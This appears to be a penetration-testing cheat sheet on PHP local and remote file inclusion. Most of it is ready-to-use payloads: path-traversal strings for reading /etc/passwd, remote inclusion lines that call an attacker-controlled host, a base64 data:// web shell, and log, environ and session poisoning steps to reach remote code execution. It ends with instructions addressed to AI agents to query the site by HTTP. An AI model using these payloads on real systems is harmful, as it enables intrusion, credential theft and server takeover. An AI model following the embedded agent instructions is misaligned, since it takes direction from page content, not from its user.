# File Inclusion/Path Traversal ## File Inclusion **Remote File Inclusion (RFI):** The file is loaded from a remote server (Best: You can write the code and the server will execute it). In php this is **disabled** by default (**allow\_url\_include**).\ **Local File Inclusion (LFI):** The sever loads a local file. The vulnerability occurs when the user can control in some way the file that is going to be load by the server. Vulnerable **PHP functions**: require, require\_once, include, include\_once #### Blind - Interesting - LFI2RCE files ```python wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../../FUZZ ``` #### Good wordlists for fuzzing {% embed url="" %} {% embed url="" %} ### Basic LFI and Bypass Techniques ```bash http://example.com/index.php?page=../../../etc/passwd #null byte http://example.com/index.php?page=../../../etc/passwd%00 #encoding http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00 #filter bypass http://example.com/index.php?page=....//....//etc/passwd http://example.com/index.php?page=....\/....\/....\/etc/passwd http://example.com/index.php?page=..///////..////..//////etc/passwd http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd http://example.com/index.php?page=/var/www/../../etc/passwd #Maintain the initial path ``` ### Top 25 parameters Here’s list of top 25 parameters that could be vulnerable to local file inclusion (LFI) vulnerabilities (from [link](https://twitter.com/trbughunters/status/1279768631845494787)): ``` ?cat={payload} ?dir={payload} ?action={payload} ?board={payload} ?date={payload} ?detail={payload} ?file={payload} ?download={payload} ?path={payload} ?folder={payload} ?prefix={payload} ?include={payload} ?page={payload} ?inc={payload} ?locate={payload} ?show={payload} ?doc={payload} ?site={payload} ?type={payload} ?view={payload} ?content={payload} ?document={payload} ?layout={payload} ?mod={payload} ?conf={payload} ``` ### Basic RFI ```python http://example.com/index.php?page=http://atacker.com/mal.php http://example.com/index.php?page=\\attacker.com\shared\mal.php ``` ## LFI / RFI using PHP wrappers & protocols ### php\://filter ```php # String Filters ## Chain string.toupper, string.rot13 and string.tolower reading /etc/passwd echo file_get_contents("php://filter/read=string.toupper|string.rot13|string.tolower/resource=file:///etc/passwd"); ## Same chain without the "|" char echo file_get_contents("php://filter/string.toupper/string.rot13/string.tolower/resource=file:///etc/passwd"); ## string.string_tags example echo file_get_contents("php://filter/string.strip_tags/resource=data://text/plain,Boldlalalala"); # Conversion filter ## B64 decode echo file_get_contents("php://filter/convert.base64-decode/resource=data://plain/text,aGVsbG8="); ## Chain B64 encode and decode echo file_get_contents("php://filter/convert.base64-encode|convert.base64-decode/resource=file:///etc/passwd"); ## convert.quoted-printable-encode example echo file_get_contents("php://filter/convert.quoted-printable-encode/resource=data://plain/text,£hellooo="); =C2=A3hellooo=3D ## convert.iconv.utf-8.utf-16le echo file_get_contents("php://filter/convert.iconv.utf-8.utf-16le/resource=data://plain/text,trololohellooo="); # Compresion Filter ## Compress + B64 echo file_get_contents("php://filter/zlib.deflate/convert.base64-encode/resource=file:///etc/passwd"); readfile('php://filter/zlib.inflate/resource=test.deflated'); #To decompress the data locally ``` ### data:// ```bash http://example.net/?page=data://text/plain, http://example.net/?page=data://text/plain, http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4= http://example.net/?page=data:text/plain, http://example.net/?page=data:text/plain, http://example.net/?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4= ``` ### expect:// ```bash http://example.com/index.php?page=expect://id http://example.com/index.php?page=expect://ls ``` ### input:// ```bash # Specify your payload in the POST parameters http://example.com/index.php?page=php://input POST DATA: ``` ### More protocols * [ ] [file://](https://www.php.net/manual/en/wrappers.file.php) — Accessing local filesystem * [ ] [http://](https://www.php.net/manual/en/wrappers.http.php) — Accessing HTTP(s) URLs * [ ] [ftp://](https://www.php.net/manual/en/wrappers.ftp.php) — Accessing FTP(s) URLs * [ ] [php://](https://www.php.net/manual/en/wrappers.php.php) — Accessing various I/O streams * [ ] [zlib://](https://www.php.net/manual/en/wrappers.compression.php) — Compression Streams * [ ] [data://](https://www.php.net/manual/en/wrappers.data.php) — Data (RFC 2397) * [ ] [glob://](https://www.php.net/manual/en/wrappers.glob.php) — Find pathnames matching pattern * [ ] [phar://](https://www.php.net/manual/en/wrappers.phar.php) — PHP Archive * [ ] [ssh2://](https://www.php.net/manual/en/wrappers.ssh2.php) — Secure Shell 2 * [ ] [rar://](https://www.php.net/manual/en/wrappers.rar.php) — RAR * [ ] [ogg://](https://www.php.net/manual/en/wrappers.audio.php) — Audio streams * [ ] [expect://](https://www.php.net/manual/en/wrappers.expect.php) — Process Interaction Streams ## LFI2RCE ### Log injection If the Apache or Nginx server is **vulnerable to LFI** and you're able to reach the log file, set the **user agent** or inside a **GET parameter** a php shell like **``** and include that file. We do this in HTB box [Vessel](https://exploit.se/htb-writeup-vessel/#step-4). **Default log paths:** ```bash /var/log/apache2/access.log /var/log/apache/access.log /var/log/apache2/error.log /var/log/apache/error.log /usr/local/apache/log/error_log /usr/local/apache2/log/error_log /var/log/nginx/access.log /var/log/nginx/error.log /var/log/httpd/error_log ``` ### Via /proc/self/environ Like a log file, send the payload in the User-Agent, it will be reflected inside the /proc/self/environ file ```bash GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1 User-Agent: ``` ### Via PHP sessions Check if the website use PHP Session (PHPSESSID) ```bash Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/ Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly ``` Sessions are stored in `/var/lib/php5/sess_[PHPSESSID]` by default ```bash /var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27. user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin"; ``` Set the cookie to `` or in POST data: ```bash login=1&user=&pass=password&lang=en_us.php ``` Use the LFI to include the PHP session file ```bash login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8n ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xpthree.gitbook.io/notes/network-services/ports/80-443-http-s/web-vulnerabilities/file-inclusion-path-traversal.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.